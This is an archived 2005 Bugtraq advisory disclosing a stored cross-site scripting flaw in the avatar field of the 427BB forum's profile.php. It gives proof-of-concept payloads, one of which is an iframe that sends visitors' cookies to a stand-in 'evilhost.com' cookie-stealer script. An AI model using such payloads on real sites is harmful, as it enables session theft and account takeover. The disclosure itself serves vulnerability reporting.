[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050301003606.12563.qmail@www.securityfocus.com>
Date: 1 Mar 2005 00:36:06 -0000
From: Raven <raven@...-security.com>
To: bugtraq@...urityfocus.com
Subject: 427BB profile.php XSS vulnerability.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB Is a simple board and I have no idea why I'm
releasing this because Its very unpopular but what
the hell. Its based on PHP And MySQL
---
Description:
In profile.php there is a avatar field that is
vulnerable to a XSS attack by a remote attacker. The
Avatar string isn't filtered of < >. This makes is
very easy for a attacker to steal a session.
---
PoC Code
Place the following code into the avatar field and
save it then reload the profile page and it will
execute this code.
"><script
language="javascript">alert("b00");</script><"
Some more code this by Blademaster
"><iframe
SRC="http://www.evilhost.com/cookiestealer.php?cookie="
WIDTH=1 HEIGHT=1></iframe><"
---
Fix and Vendor status:
Vendor has been notified, expect official patch
soon.
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Powered by blists - more mailing lists